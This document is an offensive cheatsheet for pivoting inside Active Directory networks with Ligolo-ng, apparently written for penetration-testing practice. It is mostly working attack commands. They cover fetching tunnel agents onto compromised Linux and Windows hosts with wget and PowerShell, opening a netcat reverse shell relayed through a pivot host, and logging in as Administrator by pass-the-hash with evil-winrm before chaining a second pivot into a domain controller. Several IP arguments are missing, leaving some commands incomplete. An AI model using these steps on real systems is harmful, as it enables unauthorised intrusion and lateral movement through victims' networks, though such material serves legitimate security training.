Attacking Active Directory Cheatsheet
Cheatsheet for Attacking Active Directory
Disclaimer: This cheatsheet is regularly updated to ensure accuracy; however, due to updates and evolving tools, some commands may no longer work or may have alternative methods of running them. Please verify commands as needed and consult official documentation or additional resources if a command does not perform as expected.
Important Note: Make sure you are always using the same version of Proxy and Agent (For example, both Proxy and Agent must be 0.7.2).
For more information about Ligolo-ng, visit its official GitHub Repository.
sudo apt install ligolo-ng
# Locate, copy the needed files and run them (Example with agent file)
sudo updatedb -v
locate agent
sudo cp /path/to/ligolo/agent .
sudo chmod +x agent
Move the agent file into the pivot host:
# On Kali
sudo cp /home/kali/Downloads/ligolo-ng_agent_0.7.2_linux_amd64/agent .
python3 -m http.server 443
# On Target (Linux)
cd /tmp
wget http://<kali_ip>:443/agent
# On Target (Windows using PowerShell)
cd C:\Windows\Temp
powershell -c iwr http://<kali_ip>:443/agent.exe -OutFile agent.exe
Set up Ligolo-ng on Kali:
# Create an interface
sudo ip tuntap add user Vorkharium mode tun ligolo
sudo ip link set ligolo up
# Add new IP range we want to access (Examine Pivot Host with ifconfig, ip a, etc commands)
sudo ip route add dev ligolo
ip route list
# Run the proxy file
sudo chmod +x proxy
./proxy -selfcert
# The Ligolo-ng console will now open (We will interact with it soon)
On the Pivot target, use the agent file to connect to our running proxy:
# On Linux
chmod +x agent
./agent --connect <kali_ip>:11601 -ignore-cert
# On Windows PowerShell
./agent.exe --connect <kali_ip>:11601 -ignore-cert
Now enter the following on the Ligolo-ng console:
# Enter "session" to show the available sessions
ligolo-ng » session
# Enter "1" to select the session we created when using the agent (There is only one session to choose in this case)
? Specify a session : 1
# Enter "start" to start the connection
[Agent : hackme@compromisedmachine] » start
# Now we are able to access the network
In this example:
To achieve that, we will create a new listener in our active Ligolo-ng session:
# Create new listener - Port 1234 on Kali will be the Port 9001 on the Pivot Host A
# Enter the following on the running active Kali Ligolo-ng session
listener_add --addr --to
# Start Python server on Kali using Port 1234
python3 -m http.server 1234
# From the Host B CLI, access Python server through Port 9001 at the Pivot Host to download the "test.txt" file
Following the example above, we will create a new listener, but this time we will use that listener to get a Reverse Shell:
# Create new listener - Port 1235 on Kali will be the Port 9002 on the Pivot Host A
# Enter the following on the running active Kali Ligolo-ng session
listener_add --addr --to
# Start nc listener on Kali Port 1235
nc -lvnp 1235
# Enter the following at Linux CLI on Host B to access the nc listener through Pivot Host A Port 9002
nc 9002 -e /bin/sh
# Now we successfully got a shell from the Host B ( to our Kali
The following situation is given:
To achieve that, we can do the following:
# Connect with evil-winrm
evil-winrm -i -u Administrator -H <NT_hash>
# Upload ligolo-ng agent.exe
upload agent.exe
# Set up a new ligolo interface on Kali
sudo ip tuntap add user Vorkharium mode tun ligolo2
sudo ip link set ligolo2 up
# Add the second internal network
sudo ip route add dev ligolo2
# On the Ligolo-ng current session, create a new listener connecting to the Port 11601 of the first session
listener_add --addr --to
# Run the agent.exe to create a connection from the Second Pivot Host to the First Pivot Host
./agent.exe --connect -ignore-cert
# On Ligolo-ng console - Show sessions
ligolo-ng » session
# Select the new session created from the Second Pivot Host
? Specify a session : 2 # automotors\Administrator@DC01 (Example of the name of the second pivot host)
# Start new Ligolo-ng session using the new interface "ligolo2" so it won't interfere with the first interface "ligolo"
[Agent : automotors\Administrator@DC01] » start --tun ligolo2
# Now we can access the second internal network
# Note: Our Kali IP in this example is
# Add listeners inside Ligolo-Ng console
# On Session 1 - Pivot Host A (
listener_add --addr --to
# On Session 2 - Pivot Host B (
listener_add --addr --to
# Now we can access the Port 9000 in our Kali through Port 9000 on Pivot Host B and viceversa = =